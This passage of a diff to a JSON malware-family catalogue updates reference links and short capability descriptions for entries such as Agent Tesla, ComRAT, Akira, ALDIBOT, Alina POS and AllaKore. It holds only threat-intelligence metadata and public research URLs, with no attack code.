"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/", + "https://docs.broadcom.com/doc/waterbug-attack-group", + "https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/", + "https://artemonsecurity.com/snake_whitepaper.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", + "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified" ], "synonyms": [ "ComRAT", @@ -12267,139 +12834,140 @@ "value": "Agent.BTZ" }, { - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", + "description": "A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", - "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/", "https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", - "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", - "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", - "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/", - "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", - "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/", - "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", - "https://inquest.net/blog/2021/11/02/adults-only-malware-lures", - "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant", - "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", - "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://twitter.com/MsftSecIntel/status/1392219299696152578", - "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware", - "https://lab52.io/blog/a-twisted-malware-infection-chain/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", - "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla", - "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", - "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", - "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", - "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla", - "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", - "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", - "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor", - "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", - "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html", - "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html", - "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", - "https://blog.malwarelab.pl/posts/basfu_aggah/", - "https://community.riskiq.com/article/40000d46", - "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware", - "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", - "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", - "https://blog.talosintelligence.com/ipfs-abuse/", - "https://blog.netlab.360.com/purecrypter", - "https://community.riskiq.com/article/6337984e", - "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1", - "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/", - "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", - "https://youtu.be/QQuRp7Qiuzg", - "https://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://www.telsy.com/download/4832/", - "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", - "https://community.riskiq.com/article/56e28880", - "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354", - "https://guillaumeorlando.github.io/AgentTesla", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://www.secureworks.com/research/darktortilla-malware-analysis", - "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", - "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/", - "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", - "https://asec.ahnlab.com/ko/29133/", - "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/", - "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine", - "https://malwarebookreports.com/agent-teslaggah/", - "https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/", - "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/", - "https://www.inde.nz/blog/inside-agenttesla", - "https://isc.sans.edu/diary/rss/28190", - "https://youtu.be/hxaeWyK8gMI", - "http://blog.nsfocus.net/sweed-611/", - "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", - "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", - "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/", - "https://www.youtube.com/watch?v=Q9_1xNbVQPY", - "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", - "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", - "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", - "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", - "https://isc.sans.edu/diary/rss/27092", - "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", - "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", - "https://news.sophos.com/en-us/2020/05/14/raticate/", - "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware", - "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", - "https://isc.sans.edu/diary/27088", - "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", - "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", - "http://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", - "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", - "https://securityintelligence.com/posts/roboski-global-recovery-automation/", - "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", - "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html", - "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", - "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/", - "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", - "https://unit42.paloaltonetworks.com/originlogger/", - "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", - "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", - "https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://youtu.be/BM38OshcozE", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", - "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla", - "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/", - "https://guillaumeorlando.github.io/GorgonInfectionchain", "https://isc.sans.edu/diary/28202", - "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", - "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/", - "https://isc.sans.edu/diary/27666", - "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", - "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", - "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", - "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", - "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://blog.minerva-labs.com/preventing-agenttesla", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://youtu.be/BM38OshcozE", + "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", + "http://blog.nsfocus.net/sweed-611/", + "https://blog.talosintelligence.com/ipfs-abuse/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://isc.sans.edu/diary/27666", + "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "https://community.riskiq.com/article/56e28880", + "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://isc.sans.edu/diary/27088", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/", + "https://lab52.io/blog/a-twisted-malware-infection-chain/", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", + "https://youtu.be/QQuRp7Qiuzg", + "https://www.telsy.com/download/4832/", + "https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/", + "https://securelist.com/agent-tesla-malicious-spam-campaign/107478/", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", + "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", + "https://blog.morphisec.com/agent-tesla-a-day-in-a-life-of-ir", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout", + "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf", "https://cert.gov.ua/article/861292", - "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/" + "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", + "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", + "https://blog.qualys.com/vulnerabilities-threat-research/2022/02/02/catching-the-rat-called-agent-tesla", + "https://guillaumeorlando.github.io/AgentTesla", + "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", + "https://inquest.net/blog/2021/11/02/adults-only-malware-lures", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", + "https://unit42.paloaltonetworks.com/originlogger/", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://www.bitdefender.com/blog/hotforsecurity/bitdefender-labs-sees-increased-malicious-and-scam-activity-exploiting-the-war-in-ukraine", + "https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", + "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", + "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", + "https://www.youtube.com/watch?v=Q9_1xNbVQPY", + "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://guillaumeorlando.github.io/GorgonInfectionchain", + "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", + "https://www.splunk.com/en_us/blog/security/inside-the-mind-of-a-rat-agent-tesla-detection-and-analysis.html", + "https://forensicitguy.github.io/agenttesla-rtf-dotnet-tradecraft/", + "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html", + "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", + "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", + "https://embee-research.ghost.io/agenttesla-full-analysis-api-hashing/", + "https://www.fortinet.com/blog/threat-research/fake-purchase-order-used-to-deliver-agent-tesla", + "https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html", + "https://www.inde.nz/blog/inside-agenttesla", + "https://www.secureworks.com/research/darktortilla-malware-analysis", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://youtu.be/hxaeWyK8gMI", + "https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/", + "https://blog.malwarebytes.com/cybercrime/2020/04/new-agenttesla-variant-steals-wifi-credentials/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://forensicitguy.github.io/a-tale-of-two-dropper-scripts/", + "https://community.riskiq.com/article/40000d46", + "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla", + "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", + "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware", + "https://team-cymru.com/blog/2022/07/12/an-analysis-of-infrastructure-linked-to-the-hagga-threat-actor", + "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", + "https://malwarebookreports.com/agent-teslaggah/", + "https://www.cisecurity.org/insights/blog/top-10-malware-march-2022", + "https://malgamy.github.io/malware-analysis/Deep-Analysis-Agent-Tesla/", + "https://www.bleepingcomputer.com/news/security/russia-ukraine-war-exploited-as-lure-for-malware-distribution/", + "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", + "https://www.logpoint.com/en/blog/agentteslas-capabilities-review-detection-strategies/", + "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", + "https://mp.weixin.qq.com/s/X0kAIHOSldiFDthb4IsmbQ", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", + "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", + "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", + "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant", + "https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/", + "https://isc.sans.edu/diary/Infostealer+Malware+with+Double+Extension/29354", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://isc.sans.edu/diary/rss/27092", + "https://community.riskiq.com/article/6337984e", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/", + "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/", + "https://research.openanalysis.net/dotnet/xorstringsnet/agenttesla/2023/04/16/xorstringsnet.html", + "https://blog.netlab.360.com/purecrypter", + "https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware", + "https://isc.sans.edu/diary/rss/28190", + "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", + "https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://asec.ahnlab.com/ko/29133/", + "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", + "https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked/", + "https://www.lac.co.jp/lacwatch/report/20220307_002893.html", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", + "http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/", + "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware", + "https://unit42.paloaltonetworks.com/excel-add-ins-malicious-xll-files-agent-tesla/" ], "synonyms": [ "AgenTesla", @@ -12442,22 +13010,27 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.akira", - "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/" + "https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/", + "https://stairwell.com/resources/akira-pulling-on-the-chains-of-ransomware/", + "https://cybercx.com.au/blog/akira-ransomware/", + "https://arcticwolf.com/resources/blog/conti-and-akira-chained-together/", + "https://decoded.avast.io/threatresearch/decrypted-akira-ransomware/", + "https://twitter.com/MalGamy12/status/1651972583615602694" ], "synonyms": [], "type": [] }, "uuid": "834635f7-fb0f-472c-913e-fb112ae29fdc", - "value": "Akira" + "value": "Akira (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", "https://blog.group-ib.com/task" ], "synonyms": [ @@ -12469,7 +13042,7 @@ "value": "Albaniiutas" }, { - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", @@ -12499,10 +13072,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", + "https://www.symantec.com/security-center/writeup/2016-122104-0203-99", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/", - "https://www.symantec.com/security-center/writeup/2016-122104-0203-99" + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" ], "synonyms": [ "AliceATM", @@ -12518,14 +13091,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", - "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", - "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Casting-a-Shadow-on-POS/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/", "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-1/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina--Following-The-Shadow-Part-2/", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" + "https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/", + "http://www.xylibox.com/2013/02/alina-34-pos-malware.html" ], "synonyms": [ "alina_eagle", @@ -12542,17 +13115,17 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore", - "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", - "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://blog.talosintelligence.com/2021/07/sidecopy.html", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", + "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train", "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf", "https://twitter.com/_re_fox/status/1212070711206064131", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://sebdraven.medium.com/copy-cat-of-apt-sidewinder-1893059ca68d", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", "https://github.com/Anderson-D/AllaKore", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf?1625657388", - "https://www.team-cymru.com/post/allakore-d-the-sidecopy-train", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", - "https://blog.talosintelligence.com/2021/07/sidecopy.html", - "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479" + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf" ], "synonyms": [], "type": [] @@ -12581,8 +13154,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allcomeclipper", - "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums", - "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/" + "https://bazaar.abuse.ch/browse/signature/AllcomeClipper/", + "https://www.gdatasoftware.com/blog/2022/02/37239-allcome-clipbanker-is-a-newcomer-in-malware-underground-forums" ], "synonyms": [], "type": [] @@ -12656,7 +13229,7 @@ "value": "ALPC 